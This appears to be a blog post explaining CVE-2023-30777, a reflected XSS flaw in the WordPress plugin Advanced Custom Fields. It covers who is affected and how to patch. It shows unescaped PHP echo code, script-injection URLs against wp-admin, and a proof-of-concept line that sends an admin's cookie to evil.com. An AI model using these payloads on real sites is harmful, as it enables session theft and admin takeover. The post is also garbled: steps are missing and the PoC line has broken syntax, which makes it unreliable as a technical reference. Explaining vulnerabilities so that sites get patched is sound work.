In 2023, a dangerous security hole was found in one of WordPress’s most popular plugins: Advanced Custom Fields (ACF) and Advanced Custom Fields Pro developed by WP Engine. This vulnerability, officially tracked as CVE-2023-30777, makes thousands of websites running older versions of ACF vulnerable to unauthenticated reflected Cross-Site Scripting (XSS) attacks. In this post, we'll explain what this means, how the bug works, give you a look at the code, and tell you how to protect your site.
What is Advanced Custom Fields (ACF)?
ACF is a WordPress plugin that lets developers easily add custom fields to their posts, pages, and custom types. It’s widely used, with over 2 million active installs.
What is Cross-Site Scripting (XSS)?
Cross-Site Scripting (XSS) is a type of vulnerability that allows attackers to inject malicious scripts into web pages viewed by others. When an XSS bug is “reflected” and “unauthenticated,” it means anyone can trigger it by simply sending a specially crafted link—no login needed.
Who’s affected?
Any WordPress site using Advanced Custom Fields or ACF Pro, versions 6.1.5 and below.
What’s the risk?
With reflected XSS, a hacker can trick a logged-in user (like an admin) into clicking a malicious link. That script will execute in the user’s browser with their permissions. Attackers might:
Steal cookies or session info
- Add or delete posts/pages
Vulnerable Code
The issue is in how query parameters in the plugin’s URL are not being “sanitized” or “escaped” before being echoed back in the HTML. This allows JavaScript to be injected into the page.
Here’s a simplified version of what went wrong
<?php
// Example of vulnerable code in ACF
if( isset($_GET['search']) ) {
echo '<input type="text" name="search" value="' . $_GET['search'] . '">';
}
?>
If you go to
https://example.com/wp-admin/edit.php?post_type=acf-field-group&search="><script>alert('XSS')</script>;
The code above outputs
<input type="text" name="search" value=""><script>alert('XSS')</script>
That <script> tag runs instantly in your browser!
Where exactly was this in ACF?
This specific bug was found in ACF’s admin page when handling the search parameter. But other, similar parameters could be affected. Details can be found in WP Engine’s changelog and GitHub repo:
- WP Engine ACF Changelog
- Patch details on GitHub
`
https://victim.com/wp-admin/edit.php?post_type=acf-field-group&search=">alert('Hacked')
The malicious script runs in the admin’s browser, with their login and permissions.
4. Attacker’s code can steal info/Gain control:
Proof-of-Concept (PoC)
// Stealing the admin's cookie (for demo purposes only)
document.location = 'https://evil.com/steal.php?cookie='; + document.cookie;
Fixing the Bug
ACF fixed this issue quickly in version 6.1.6 by properly escaping and sanitizing the reflected input.
> Solution: Update Immediately!
> Go to your WordPress dashboard and update Advanced Custom Fields/Advanced Custom Fields Pro to 6.1.6 or newer.
Or via WP-CLI
wp plugin update advanced-custom-fields
References and Additional Reading
- Official WP Engine Advisory
- WPScan Vulnerability Report
- NVD CVE-2023-30777 entry
- Patch: ACF 6.1.6 Release Notes
- WPTavern News coverage
Always keep plugins updated.
- Use a firewall like Wordfence or Sucuri.
- Review plugin changelogs and follow major vulnerability feeds (WPScan, NVD).
Final Words
CVE-2023-30777 is a good reminder that even the most popular and well-maintained plugins sometimes slip up. XSS bugs are impactful because they let hackers take control through simple tricks—often just clicking a bad link.
If you use Advanced Custom Fields, double-check your version and update right away. And always be careful opening suspicious links, even on sites you trust!
If you found this useful, check out the reference links for more deep-dives. Stay safe out there!
*All content here is original and exclusive for your learning. Share to help keep WordPress users secure!*
Timeline
Published on: 05/10/2023 06:15:00 UTC
Last modified on: 05/17/2023 16:42:00 UTC